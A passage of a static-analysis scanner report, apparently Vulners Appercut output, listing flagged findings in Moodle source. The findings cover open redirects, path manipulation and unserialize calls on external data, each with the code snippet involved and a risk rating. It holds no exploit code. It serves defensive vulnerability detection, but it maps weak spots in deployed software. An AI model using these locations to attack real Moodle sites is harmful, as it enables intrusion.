M.core.dialogue({draggable:!0,modal:!0,closeButton:!0,headerContent:b[0],bodyContent:c.html()});d.show(),a(\"#addtags_form input[type=text]\").focus(),a(\"#addtags_form #addtags_cancel\").on(\"click\",function(){d.destroy()})})})},initManageCollectionsPage:function(){a(\"body\").on(\"updated\",\"[data-inplaceeditable]\",function(b){var c,d,e,f=b.ajaxreturn;\"core_tag\"===f.component&&\"tagareaenable\"===f.itemtype&&(c=a(this).attr(\"data-itemid\"),a(\".tag-collections-table ul[data-collectionid] li[data-areaid=\"+c+\"]\").addClass(\"hidden\"),e=f.value,\"1\"===e?(a(this).closest(\"tr\").removeClass(\"dimmed_text\"),d=a(this).closest(\"tr\").find('[data-itemtype=\"tagareacollection\"]').attr(\"data-value\"),a(\".tag-collections-table ul[data-collectionid=\"+d+\"] li[data-areaid=\"+c+\"]\").removeClass(\"hidden\")):a(this).closest(\"tr\").addClass(\"dimmed_text\")),\"core_tag\"===f.component&&\"tagareacollection\"===f.itemtype&&(c=a(this).attr(\"data-itemid\"),a(\".tag-collections-table ul[data-collectionid] li[data-areaid=\"+c+\"]\").addClass(\"hidden\"),d=a(this).attr(\"data-value\"),e=a(this).closest(\"tr\").find('[data-itemtype=\"tagareaenable\"]').attr(\"data-value\"),\"1\"===e&&a(\".tag-collections-table ul[data-collectionid=\"+d+\"] li[data-areaid=\"+c+\"]\").removeClass(\"hidden\"))}),a(\"body\").on(\"click\",\".addtagcoll > a\",function(b){b.preventDefault();var c=a(this).attr(\"data-url\")+\"&sesskey=\"+M.cfg.sesskey;e.get_strings([{key:\"addtagcoll\",component:\"tag\"},{key:\"name\"},{key:\"searchable\",component:\"tag\"},{key:\"create\"},{key:\"cancel\"}]).done(function(b){var d=a('<div><form id=\"addtagcoll_form\" class=\"form-inline\"><p><label for=\"addtagcoll_name\"></label>: <input id=\"addtagcoll_name\" type=\"text\"/></p><p><label for=\"addtagcoll_searchable\"></label>: <input id=\"addtagcoll_searchable\" type=\"checkbox\" value=\"1\" checked/></p><p class=\"mdl-align\"><input type=\"submit\" id=\"addtagcoll_submit\"/><input type=\"button\" id=\"addtagcoll_cancel\"/></p></form></div>');d.find('label[for=\"addtagcoll_name\"]').html(b[1]),d.find('label[for=\"addtagcoll_searchable\"]').html(b[2]),d.find(\"#addtagcoll_submit\").attr(\"value\",b[3]),d.find(\"#addtagcoll_cancel\").attr(\"value\",b[4]);var e=new M.core.dialogue({draggable:!0,modal:!0,closeButton:!0,headerContent:b[0],bodyContent:d.html()});e.show(),a(\"#addtagcoll_form #addtagcoll_name\").focus(),a(\"#addtagcoll_form #addtagcoll_cancel\").on(\"click\",function(){e.destroy()}),a(\"#addtagcoll_form\").on(\"submit\",function(){var b=a(\"#addtagcoll_form #addtagcoll_name\").val(),d=a(\"#addtagcoll_form #addtagcoll_searchable\").prop(\"checked\")?1:0;return String(b).length>0&&(window.location.href=c+\"&name=\"+encodeURIComponent(b)+\"&searchable=\"+d),!1})})}),a(\"body\").on(\"click\",\".tag-collections-table .action_delete\",function(b){b.preventDefault();var c=a(this).attr(\"data-url\")+\"&sesskey=\"+M.cfg.sesskey;e.get_strings([{key:\"delete\"},{key:\"suredeletecoll\",component:\"tag\",param:a(this).attr(\"data-collname\")},{key:\"yes\"},{key:\"no\"}]).done(function(a){d.confirm(a[0],a[1],a[2],a[3],function(){window.location.href=c})})})}}});\n", "functionName": "--AnonymousClass--moodle_lib_amd_build_tag_min_1_104::Anonymous_moodle_lib_amd_build_tag_min_1_3709", "endLineNumber": 1, "positionInStartLine": 3712, "positionInEndLine": 3866, "appercutAttackItemId": 8950, "startLineNumber": 1}, {"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " {key : 'nameuseddocombine', component : 'tag'},\n {key : 'yes'},\n {key : 'cancel'},\n ]).done(function(s) {\n notification.confirm(e.message, s[0], s[1], s[2], function() {\n window.location.href = window.location.href + \"&newname=\" + encodeURIComponent(newvalue) +\n \"&tagid=\" + encodeURIComponent(tagid) +\n '&action=renamecombine&sesskey=' + M.cfg.sesskey;\n });\n });\n }\n });\n\n", "functionName": "--AnonymousClass--moodle_lib_amd_src_tag_27_41::Anonymous_moodle_lib_amd_src_tag_191_82", "endLineNumber": 194, "positionInStartLine": 28, "positionInEndLine": 80, "appercutAttackItemId": 8949, "startLineNumber": 192}, {"sourceFileName": "moodle/admin/tool/spamcleaner/module.js", "code": " } catch(e) {\n alert(M.util.get_string('spaminvalidresult', 'tool_spamcleaner'));\n return;\n }\n if (resp == true) {\n window.location.href=window.location.href;\n }\n }\n }\n };\n context.Y.io(context.me+'?delall=yes&sesskey='+M.cfg.sesskey, cfg);\n", "functionName": "--AnonymousClass--moodle_admin_tool_spamcleaner_module_1_21.cfg.--AnonymousClass--moodle_admin_tool_spamcleaner_module_13_20::Anonymous_moodle_admin_tool_spamcleaner_module_14_38", "endLineNumber": 22, "positionInStartLine": 28, "positionInEndLine": 69, "appercutAttackItemId": 8948, "startLineNumber": 22}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionRedirect.html", "positionInStartLine": 3712, "patternDescription": "If the application redirects users to webpages based on input parameters, the malicious user can sometimes control the destination address.", "appercutVulnerName": "Redirecting the User to a Malicious Site", "endLineNumber": 1, "positionInEndLine": 3866, "startLineNumber": 1, "patternCodeLanguage": "JavaScript", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/auth/cas/CAS/CAS.php", "code": " * The default directory for the debug file under Unix.\n */\nfunction gettmpdir() {\nif (!empty($_ENV['TMP'])) { return realpath($_ENV['TMP']); }\nif (!empty($_ENV['TMPDIR'])) { return realpath( $_ENV['TMPDIR']); }\nif (!empty($_ENV['TEMP'])) { return realpath( $_ENV['TEMP']); }\nreturn \"/tmp\";\n}\ndefine('DEFAULT_DEBUG_DIR', gettmpdir().\"/\");\n\n/** @} */\n", "vulnerId": "APPCUT:62:14663", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionPath.html", "positionInStartLine": 36, "patternDescription": "In order to define relative paths in file system, \u201c./\u201d \u201cand \u201c../\u201d characters are often used (with backslashes in Windows), representing current and parent directories, respectively. If the application responsible for forming paths to necessary files uses external data, the malicious user can advantage of it if the input is not filtered properly. As a result, the malicious user can read or write application server local files that were not intended by the developer.", "appercutVulnerName": "File System Path Manipulation", "endLineNumber": 252, "positionInEndLine": 60, "startLineNumber": 252, "patternCodeLanguage": "PHP", "appercutRisk": "HIGH"}, {"sourceFileName": "moodle/lib/flickrlib.php", "code": " function getFriendlyGeodata($lat, $lon) {\n /** I've added this method to get the friendly geodata (i.e. 'in New York, NY') that the\n * website provides, but isn't available in the API. I'm providing this service as long\n * as it doesn't flood my server with requests and crash it all the time.\n */\n return unserialize(file_get_contents('http://phpflickr.com/geodata/?format=php&lat=' . $lat . '&lon=' . $lon));\n }\n\n function auth ($perms = \"write\", $remember_uri = true)\n {\n // Redirects to Flickr's authentication piece if there is no valid token.\n", "vulnerId": "APPCUT:62:14531", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 15, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 238, "positionInEndLine": 118, "startLineNumber": 238, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_cs.php", "code": "\t\t\t\t\treturn 1;\n\t\t\t\t}\n\n\t\t\t\t\t// Use cached version if possible\n\t\t\t\tif ($cacheFileASCII && @is_file($cacheFileASCII)) {\n\t\t\t\t\t$this->toASCII['utf-8'] = unserialize(t3lib_div::getUrl($cacheFileASCII));\n\t\t\t\t\treturn 2;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t}\n\n", "vulnerId": "APPCUT:62:14528", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t} else {\n\t\t\tif (isset($report)) {\n\t\t\t\t$report['lib'] = 'file';\n\t\t\t}\n\n\t\t\t$content = @file_get_contents($url);\n\n\t\t\tif ($content === FALSE && isset($report)) {\n\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2758, "positionInStartLine": 3, "positionInEndLine": 38, "appercutAttackItemId": 8991, "startLineNumber": 2758}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_div.php", "code": "\t\t\t\t$report['error'] = -1;\n\t\t\t\t$report['message'] = 'Couldn\\'t get URL: ' . implode(LF, $http_response_header);\n\t\t\t}\n\t\t}\n\n\t\treturn $content;\n\t}\n\n\t/**\n\t * Writes $content to the file $file\n\t *\n", "functionName": "Global.t3lib_div::getUrl", "endLineNumber": 2766, "positionInStartLine": 2, "positionInEndLine": 17, "appercutAttackItemId": 8992, "startLineNumber": 2766}, {"sourceFileName": "moodle/lib/typo3/class.t3lib_cs.php", "code": "\t\t\t\t\treturn 1;\n\t\t\t\t}\n\n\t\t\t\t\t// Use cached version if possible\n\t\t\t\tif ($cacheFileASCII && @is_file($cacheFileASCII)) {\n\t\t\t\t\t$this->toASCII['utf-8'] = unserialize(t3lib_div::getUrl($cacheFileASCII));\n\t\t\t\t\treturn 2;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t}\n\n", "functionName": "Global.t3lib_cs::initUnicodeData", "endLineNumber": 1114, "positionInStartLine": 31, "positionInEndLine": 78, "appercutAttackItemId": 8993, "startLineNumber": 1114}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 31, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 1114, "positionInEndLine": 78, "startLineNumber": 1114, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/adodb/adodb-active-record.inc.php", "code": "\t\t$db = $activedb->db;\n\t\t$fname = $ADODB_CACHE_DIR . '/adodb_' . $db->databaseType . '_active_'. $table . '.cache';\n\t\tif (!$forceUpdate && $ADODB_ACTIVE_CACHESECS && $ADODB_CACHE_DIR && file_exists($fname)) {\n\t\t\t$fp = fopen($fname,'r');\n\t\t\t@flock($fp, LOCK_SH);\n\t\t\t$acttab = unserialize(fread($fp,100000));\n\t\t\tfclose($fp);\n\t\t\tif ($acttab->_created + $ADODB_ACTIVE_CACHESECS - (abs(rand()) % 16) > time()) {\n\t\t\t\t// abs(rand()) randomizes deletion, reducing contention to delete/refresh file\n\t\t\t\t// ideally, you should cache at least 32 secs\n\n", "vulnerId": "APPCUT:62:14535", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 13, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 403, "positionInEndLine": 43, "startLineNumber": 403, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/htmlpurifier/HTMLPurifier/DefinitionCache/Serializer.php", "code": " {\n $file = $this->generateFilePath($config);\n if (!file_exists($file)) {\n return false;\n }\n return unserialize(file_get_contents($file));\n }\n\n /**\n * @param HTMLPurifier_Config $config\n * @return bool\n", "vulnerId": "APPCUT:62:14538", "functionName": "None", "appercutAttackItems": [], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/Php/InjectionUnserialize.html", "positionInStartLine": 15, "patternDescription": "The \u2018serialize\u2019 function is used to display PHP variables as strings. The \u2018unserialize\u2019 function does the reverse transformation. If user data is used when calling the \u2018unserialize\u2019 function, the malicious user can create and initialize variables in the context of application names, which can lead to a breach of application logic, or even remote code execution.", "appercutVulnerName": "Incorrect User Input Filtration when Using the unserialize Function", "endLineNumber": 73, "positionInEndLine": 52, "startLineNumber": 73, "patternCodeLanguage": "PHP", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " {key : 'nameuseddocombine', component : 'tag'},\n {key : 'yes'},\n {key : 'cancel'},\n ]).done(function(s) {\n notification.confirm(e.message, s[0], s[1], s[2], function() {\n window.location.href = window.location.href + \"&newname=\" + encodeURIComponent(newvalue) +\n \"&tagid=\" + encodeURIComponent(tagid) +\n '&action=renamecombine&sesskey=' + M.cfg.sesskey;\n });\n });\n }\n });\n\n", "vulnerId": "APPCUT:62:14428", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/amd/build/tag.min.js", "code": "define([\"jquery\",\"core/ajax\",\"core/templates\",\"core/notification\",\"core/str\"],function(a,b,c,d,e){return{initTagindexPage:function(){a(\"body\").delegate(\".tagarea[data-ta] a[data-quickload=1]\",\"click\",function(d){d.preventDefault();var e=a(this),f=e.context.search.replace(/^\\?/,\"\"),g=e.closest(\".tagarea[data-ta]\"),h=f.split(\"&\").reduce(function(a,b){var c=b.split(\"=\");return a[c[0]]=decodeURIComponent(c[1]),a},{}),i=b.call([{methodname:\"core_tag_get_tagindex\",args:{tagindex:h}}],!0);a.when.apply(a,i).done(function(a){c.render(\"core_tag/index\",a).done(function(a){g.replaceWith(a)})})})},initManagePage:function(){a(\"body\").on(\"updated\",\"[data-inplaceeditable]\",function(b){if(e.get_string(\"now\").done(function(c){a(b.target).closest(\"tr\").find(\"td.col-timemodified\").html(c)}),\"tagflag\"===b.ajaxreturn.itemtype){var c=a(b.target).closest(\"tr\");\"0\"===b.ajaxreturn.value?c.removeClass(\"flagged-tag\"):c.addClass(\"flagged-tag\")}}),a(\".tag-management-table\").delegate(\"a.tagdelete\",\"click\",function(b){b.preventDefault();var c=a(this).attr(\"href\");e.get_strings([{key:\"delete\"},{key:\"confirmdeletetag\",component:\"tag\"},{key:\"yes\"},{key:\"no\"}]).done(function(a){d.confirm(a[0],a[1],a[2],a[3],function(){window.location.href=c})})}),a(\"#tag-management-delete\").click(function(b){var c=a(this).closest(\"form\").get(0),f=a(c).find(\"input[type=checkbox]:checked\").length;if(!f)return!1;var g=a(\"<input type='hidden'/>\").attr(\"name\",this.name);b.preventDefault(),e.get_strings([{key:\"delete\"},{key:\"confirmdeletetags\",component:\"tag\"},{key:\"yes\"},{key:\"no\"}]).done(function(a){d.confirm(a[0],a[1],a[2],a[3],function(){g.appendTo(c),c.submit()})})}),a(\"#tag-management-combine\").click(function(b){b.preventDefault();var c=a(this).closest(\"form\").get(0),f=a(c).find(\"input[type=checkbox]:checked\");if(f.length<=1)return e.get_strings([{key:\"combineselected\",component:\"tag\"},{key:\"selectmultipletags\",component:\"tag\"},{key:\"ok\"}]).done(function(a){d.alert(a[0],a[1],a[2])}),!1;var g=a(\"<input type='hidden'/>\").attr(\"name\",this.name);e.get_strings([{key:\"combineselected\",component:\"tag\"},{key:\"selectmaintag\",component:\"tag\"},{key:\"continue\"},{key:\"cancel\"}]).done(function(b){var d=a('<div><form id=\"combinetags_form\" class=\"form-inline\"><p class=\"description\"></p><p class=\"options\"></p><p class=\"mdl-align\"><input type=\"submit\" id=\"combinetags_submit\"/><input type=\"button\" id=\"combinetags_cancel\"/></p></form></div>');d.find(\".description\").html(b[1]),d.find(\"#combinetags_submit\").attr(\"value\",b[2]),d.find(\"#combinetags_cancel\").attr(\"value\",b[3]);var e=d.find(\".options\");f.each(function(){var b=a(this).val(),c=a(\".inplaceeditable[data-itemtype=tagname][data-itemid=\"+b+\"]\").attr(\"data-value\");e.append(a('<input type=\"radio\" name=\"maintag\" id=\"combinetags_maintag_'+b+'\" value=\"'+b+'\"/><label for=\"combinetags_maintag_'+b+'\">'+c+\"</label><br>\"))});var h=new M.core.dialogue({draggable:!0,modal:!0,closeButton:!0,headerContent:b[0],bodyContent:d.html()});h.show(),a(\"#combinetags_form input[type=radio]\").first().focus().prop(\"checked\",!0),a(\"#combinetags_form #combinetags_cancel\").on(\"click\",function(){h.destroy()}),a(\"#combinetags_form\").on(\"submit\",function(){g.appendTo(c);var b=a(\"input[name=maintag]:checked\",\"#combinetags_form\").val();return a(\"<input type='hidden'/>\").attr(\"name\",\"maintag\").attr(\"value\",b).appendTo(c),c.submit(),!1})})}),a(\"body\").on(\"updatefailed\",\"[data-inplaceeditable][data-itemtype=tagname]\",function(b){var c=b.exception,f=b.newvalue,g=a(b.target).attr(\"data-itemid\");\"namesalreadybeeingused\"===c.errorcode&&(b.preventDefault(),e.get_strings([{key:\"nameuseddocombine\",component:\"tag\"},{key:\"yes\"},{key:\"cancel\"}]).done(function(a){d.confirm(b.message,a[0],a[1],a[2],function(){window.location.href=window.location.href+\"&newname=\"+encodeURIComponent(f)+\"&tagid=\"+encodeURIComponent(g)+\"&action=renamecombine&sesskey=\"+M.cfg.sesskey})}))}),a(\"body\").on(\"click\",\"a[data-action=addstandardtag]\",function(b){b.preventDefault(),e.get_strings([{key:\"addotags\",component:\"tag\"},{key:\"inputstandardtags\",component:\"tag\"},{key:\"continue\"},{key:\"cancel\"}]).done(function(b){var c=a('<div><form id=\"addtags_form\" class=\"form-inline\" method=\"POST\"><input type=\"hidden\" name=\"action\" value=\"addstandardtag\"/><input type=\"hidden\" name=\"sesskey\" value=\"'+M.cfg.sesskey+'\"/><p><label for=\"id_tagslist\">'+b[1]+'</label><input type=\"text\" id=\"id_tagslist\" name=\"tagslist\"/></p><p class=\"mdl-align\"><input type=\"submit\" id=\"addtags_submit\"/><input type=\"button\" id=\"addtags_cancel\"/></p></form></div>');c.find(\"#addtags_form\").attr(\"action\",window.location.href),c.find(\"#addtags_submit\").attr(\"value\",b[2]),c.find(\"#addtags_cancel\").attr(\"value\",b[3]);var d=new M.core.dialogue({draggable:!0,modal:!0,closeButton:!0,headerContent:b[0],bodyContent:c.html()});d.show(),a(\"#addtags_form input[type=text]\").focus(),a(\"#addtags_form #addtags_cancel\").on(\"click\",function(){d.destroy()})})})},initManageCollectionsPage:function(){a(\"body\").on(\"updated\",\"[data-inplaceeditable]\",function(b){var c,d,e,f=b.ajaxreturn;\"core_tag\"===f.component&&\"tagareaenable\"===f.itemtype&&(c=a(this).attr(\"data-itemid\"),a(\".tag-collections-table ul[data-collectionid] li[data-areaid=\"+c+\"]\").addClass(\"hidden\"),e=f.value,\"1\"===e?(a(this).closest(\"tr\").removeClass(\"dimmed_text\"),d=a(this).closest(\"tr\").find('[data-itemtype=\"tagareacollection\"]').attr(\"data-value\"),a(\".tag-collections-table ul[data-collectionid=\"+d+\"] li[data-areaid=\"+c+\"]\").removeClass(\"hidden\")):a(this).closest(\"tr\").addClass(\"dimmed_text\")),\"core_tag\"===f.component&&\"tagareacollection\"===f.itemtype&&(c=a(this).attr(\"data-itemid\"),a(\".tag-collections-table ul[data-collectionid] li[data-areaid=\"+c+\"]\").addClass(\"hidden\"),d=a(this).attr(\"data-value\"),e=a(this).closest(\"tr\").find('[data-itemtype=\"tagareaenable\"]').attr(\"data-value\"),\"1\"===e&&a(\".tag-collections-table ul[data-collectionid=\"+d+\"] li[data-areaid=\"+c+\"]\").removeClass(\"hidden\"))}),a(\"body\").on(\"click\",\".addtagcoll > a\",function(b){b.preventDefault();var c=a(this).attr(\"data-url\")+\"&sesskey=\"+M.cfg.sesskey;e.get_strings([{key:\"addtagcoll\",component:\"tag\"},{key:\"name\"},{key:\"searchable\",component:\"tag\"},{key:\"create\"},{key:\"cancel\"}]).done(function(b){var d=a('<div><form id=\"addtagcoll_form\" class=\"form-inline\"><p><label for=\"addtagcoll_name\"></label>: <input id=\"addtagcoll_name\" type=\"text\"/></p><p><label for=\"addtagcoll_searchable\"></label>: <input id=\"addtagcoll_searchable\" type=\"checkbox\" value=\"1\" checked/></p><p class=\"mdl-align\"><input type=\"submit\" id=\"addtagcoll_submit\"/><input type=\"button\" id=\"addtagcoll_cancel\"/></p></form></div>');d.find('label[for=\"addtagcoll_name\"]').html(b[1]),d.find('label[for=\"addtagcoll_searchable\"]').html(b[2]),d.find(\"#addtagcoll_submit\").attr(\"value\",b[3]),d.find(\"#addtagcoll_cancel\").attr(\"value\",b[4]);var e=new M.core.dialogue({draggable:!0,modal:!0,closeButton:!0,headerContent:b[0],bodyContent:d.html()});e.show(),a(\"#addtagcoll_form #addtagcoll_name\").focus(),a(\"#addtagcoll_form #addtagcoll_cancel\").on(\"click\",function(){e.destroy()}),a(\"#addtagcoll_form\").on(\"submit\",function(){var b=a(\"#addtagcoll_form #addtagcoll_name\").val(),d=a(\"#addtagcoll_form #addtagcoll_searchable\").prop(\"checked\")?1:0;return String(b).length>0&&(window.location.href=c+\"&name=\"+encodeURIComponent(b)+\"&searchable=\"+d),!1})})}),a(\"body\").on(\"click\",\".tag-collections-table .action_delete\",function(b){b.preventDefault();var c=a(this).attr(\"data-url\")+\"&sesskey=\"+M.cfg.sesskey;e.get_strings([{key:\"delete\"},{key:\"suredeletecoll\",component:\"tag\",param:a(this).attr(\"data-collname\")},{key:\"yes\"},{key:\"no\"}]).done(function(a){d.confirm(a[0],a[1],a[2],a[3],function(){window.location.href=c})})})}}});\n", "functionName": "--AnonymousClass--moodle_lib_amd_build_tag_min_1_104::Anonymous_moodle_lib_amd_build_tag_min_1_3709", "endLineNumber": 1, "positionInStartLine": 3712, "positionInEndLine": 3866, "appercutAttackItemId": 8942, "startLineNumber": 1}, {"sourceFileName": "moodle/admin/tool/spamcleaner/module.js", "code": " } catch(e) {\n alert(M.util.get_string('spaminvalidresult', 'tool_spamcleaner'));\n return;\n }\n if (resp == true) {\n window.location.href=window.location.href;\n }\n }\n }\n };\n context.Y.io(context.me+'?delall=yes&sesskey='+M.cfg.sesskey, cfg);\n", "functionName": "--AnonymousClass--moodle_admin_tool_spamcleaner_module_1_21.cfg.--AnonymousClass--moodle_admin_tool_spamcleaner_module_13_20::Anonymous_moodle_admin_tool_spamcleaner_module_14_38", "endLineNumber": 22, "positionInStartLine": 28, "positionInEndLine": 69, "appercutAttackItemId": 8943, "startLineNumber": 22}, {"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " panel.destroy();\n });\n $('#addtagcoll_form').on('submit', function() {\n var name = $('#addtagcoll_form #addtagcoll_name').val();\n var searchable = $('#addtagcoll_form #addtagcoll_searchable').prop('checked') ? 1 : 0;\n if (String(name).length > 0) {\n window.location.href = href + \"&name=\" + encodeURIComponent(name) + \"&searchable=\" + searchable;\n }\n return false;\n });\n }\n", "functionName": "--AnonymousClass--moodle_lib_amd_src_tag_27_41::Anonymous_moodle_lib_amd_src_tag_304_67", "endLineNumber": 307, "positionInStartLine": 38, "positionInEndLine": 44, "appercutAttackItemId": 8940, "startLineNumber": 307}, {"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " {key : 'nameuseddocombine', component : 'tag'},\n {key : 'yes'},\n {key : 'cancel'},\n ]).done(function(s) {\n notification.confirm(e.message, s[0], s[1], s[2], function() {\n window.location.href = window.location.href + \"&newname=\" + encodeURIComponent(newvalue) +\n \"&tagid=\" + encodeURIComponent(tagid) +\n '&action=renamecombine&sesskey=' + M.cfg.sesskey;\n });\n });\n }\n });\n\n", "functionName": "--AnonymousClass--moodle_lib_amd_src_tag_27_41::Anonymous_moodle_lib_amd_src_tag_191_82", "endLineNumber": 194, "positionInStartLine": 28, "positionInEndLine": 80, "appercutAttackItemId": 8944, "startLineNumber": 192}, {"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " });\n $('#addtagcoll_form').on('submit', function() {\n var name = $('#addtagcoll_form #addtagcoll_name').val();\n var searchable = $('#addtagcoll_form #addtagcoll_searchable').prop('checked') ? 1 : 0;\n if (String(name).length > 0) {\n window.location.href = href + \"&name=\" + encodeURIComponent(name) + \"&searchable=\" + searchable;\n }\n return false;\n });\n }\n );\n", "functionName": "--AnonymousClass--moodle_lib_amd_src_tag_27_41::Anonymous_moodle_lib_amd_src_tag_304_67", "endLineNumber": 308, "positionInStartLine": 32, "positionInEndLine": 127, "appercutAttackItemId": 8941, "startLineNumber": 308}, {"sourceFileName": "moodle/lib/amd/src/tag.js", "code": " $('#addtagcoll_form #addtagcoll_name').focus();\n $('#addtagcoll_form #addtagcoll_cancel').on('click', function() {\n panel.destroy();\n });\n $('#addtagcoll_form').on('submit', function() {\n var name = $('#addtagcoll_form #addtagcoll_name').val();\n var searchable = $('#addtagcoll_form #addtagcoll_searchable').prop('checked') ? 1 : 0;\n if (String(name).length > 0) {\n window.location.href = href + \"&name=\" + encodeURIComponent(name) + \"&searchable=\" + searchable;\n }\n return false;\n", "functionName": "--AnonymousClass--moodle_lib_amd_src_tag_27_41::Anonymous_moodle_lib_amd_src_tag_304_67", "endLineNumber": 305, "positionInStartLine": 32, "positionInEndLine": 83, "appercutAttackItemId": 8939, "startLineNumber": 305}], "appercutDescriptionRef": "https://vulners.com/static/appercut/en/JavaScript/InjectionRedirect.html", "positionInStartLine": 28, "patternDescription": "If the application redirects users to webpages based on input parameters, the malicious user can sometimes control the destination address.", "appercutVulnerName": "Redirecting the User to a Malicious Site", "endLineNumber": 194, "positionInEndLine": 80, "startLineNumber": 192, "patternCodeLanguage": "JavaScript", "appercutRisk": "MEDIUM"}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " * @return Minify_Source\n */\n protected function _getFileSource($file, $cOptions)\n {\n $spec['filepath'] = $file;\n if ($cOptions['noMinPattern'] && preg_match($cOptions['noMinPattern'], basename($file))) {\n if (preg_match('~\\.css$~i', $file)) {\n $spec['minifyOptions']['compress'] = false;\n } else {\n $spec['minifier'] = '';\n }\n", "vulnerId": "APPCUT:62:14661", "functionName": "None", "appercutAttackItems": [{"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " }\n $basenames = array(); // just for cache id\n foreach ($files as $file) {\n $uri = $base . $file;\n $path = $_SERVER['DOCUMENT_ROOT'] . $uri;\n $realpath = realpath($path);\n if (false === $realpath || ! is_file($realpath)) {\n $this->log(\"The path \\\"{$path}\\\" (realpath \\\"{$realpath}\\\") could not be found (or was not a file)\");\n if (null === $firstMissingResource) {\n $firstMissingResource = $uri;\n continue;\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 146, "positionInStartLine": 16, "positionInEndLine": 43, "appercutAttackItemId": 9388, "startLineNumber": 146}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " return $options;\n }\n }\n try {\n parent::checkNotHidden($realpath);\n parent::checkAllowDirs($realpath, $allowDirs, $uri);\n } catch (Exception $e) {\n $this->log($e->getMessage());\n return $options;\n }\n $sources[] = $this->_getFileSource($realpath, $cOptions);\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 160, "positionInStartLine": 28, "positionInEndLine": 71, "appercutAttackItemId": 9392, "startLineNumber": 160}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " * @return Minify_Source\n */\n protected function _getFileSource($file, $cOptions)\n {\n $spec['filepath'] = $file;\n if ($cOptions['noMinPattern'] && preg_match($cOptions['noMinPattern'], basename($file))) {\n if (preg_match('~\\.css$~i', $file)) {\n $spec['minifyOptions']['compress'] = false;\n } else {\n $spec['minifier'] = '';\n }\n", "functionName": "Global.Minify_Controller_MinApp::_getFileSource", "endLineNumber": 201, "positionInStartLine": 79, "positionInEndLine": 94, "appercutAttackItemId": 9394, "startLineNumber": 201}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " $this->checkType($m[1]);\n } catch (Exception $e) {\n $this->log($e->getMessage());\n return $options;\n }\n $files = explode(',', $_GET['f']);\n if ($files != array_unique($files)) {\n $this->log(\"Duplicate files were specified\");\n return $options;\n }\n if (isset($_GET['b'])) {\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 119, "positionInStartLine": 12, "positionInEndLine": 45, "appercutAttackItemId": 9383, "startLineNumber": 119}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " foreach ((array)$cOptions['allowDirs'] as $allowDir) {\n $allowDirs[] = realpath(str_replace('//', $_SERVER['DOCUMENT_ROOT'] . '/', $allowDir));\n }\n $basenames = array(); // just for cache id\n foreach ($files as $file) {\n $uri = $base . $file;\n $path = $_SERVER['DOCUMENT_ROOT'] . $uri;\n $realpath = realpath($path);\n if (false === $realpath || ! is_file($realpath)) {\n $this->log(\"The path \\\"{$path}\\\" (realpath \\\"{$realpath}\\\") could not be found (or was not a file)\");\n if (null === $firstMissingResource) {\n", "functionName": "Global.Minify_Controller_MinApp::setupSources", "endLineNumber": 144, "positionInStartLine": 16, "positionInEndLine": 36, "appercutAttackItemId": 9386, "startLineNumber": 144}, {"sourceFileName": "moodle/lib/minify/lib/Minify/Controller/MinApp.php", "code": " $allowDirs = array();\n foreach ((array)$cOptions['allowDirs'] as $allowDir) {\n $allowDirs[] = realpath(str_replace('//', $_SERVER['DOCUMENT_ROOT'] . '/', $allowDir));\n }\n $basenames = array(); 